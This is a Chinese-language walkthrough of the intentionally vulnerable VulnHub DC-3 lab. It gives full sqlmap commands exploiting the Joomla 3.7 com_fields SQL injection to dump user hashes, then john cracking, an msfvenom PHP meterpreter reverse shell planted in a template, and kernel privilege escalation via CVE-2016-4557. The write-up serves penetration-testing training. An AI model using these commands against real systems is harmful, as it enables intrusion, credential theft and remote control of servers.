01 环境搭建
- 靶机环境下载:https://www.vulnhub.com/entry/dc-3,312/
- 题目信息如下
Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Technical Information
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.
Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
02 信息收集
将靶机环境恢复到virtualbox之后,开始第一步信息收集工作。
发现靶机
查看攻击机的ip为192.168.56.1(环境恢复时采用Host-Only Adapter)
使用nmap扫描网段内的ip地址
nmap -sP 192.168.56.1/24
扫描发现的
192.168.56.18就是目标靶机的ip地址。
端口扫描
使用nmap对目标靶机开放的端口进行扫描
nmap -Pn -n -sV 192.168.56.18
发现目标靶机开放了1个tcp端口80。
web框架
访问web页面,提示本次只有一个flag。
通过nmap扫描得知web采用了Joomla!。
使用dirb扫描发现其后台登录页面为http://192.168.56.18/administrator/。
访问README.txt得到其版本号为3.7
在exploitdb上搜索发现该版本存在一个sql注入漏洞
03 获取账户
使用sqlmap查询靶机上的数据库。
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs --batch
也可以在查表前重新验证下此url是不是有sql注入漏洞
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch
发现有个joomladb到数据库。查询该数据库的表。
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables --batch
在结果中发现一个#__users的表,查询该表的字段。
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns --batch
python交互有点问题,无法在do you want to use common column existence check?时输入y,无法获取字段名。
尝试猜解字段名,得到账户和密码密文。
qlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C name,password --dump --batch
使用john爆破该密码。获得密码明文为snoopy。
04 获得shell
使用admin账户登录http://192.168.56.18/administrator。发现可以编辑模板里面的php文件。且这些模板可以从外部访问
编辑Beez3模板的index.php文件
使用msfvenom生成一个反弹shell,并将其复制到index.php中。
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 lport=4444 -f raw >shell.php
然后通过msfconsole来监听。
也可以用其他的webshell。
05 提权
获取到反弹shell之后,搜索suid没有发现能利用提权到程序。
查看Linux内核版本,尝试搜索内核漏洞。
使用脚本可以识别出当前内核存在到漏洞。
使用CVE-2016-4557尝试提权成功,获得最终flag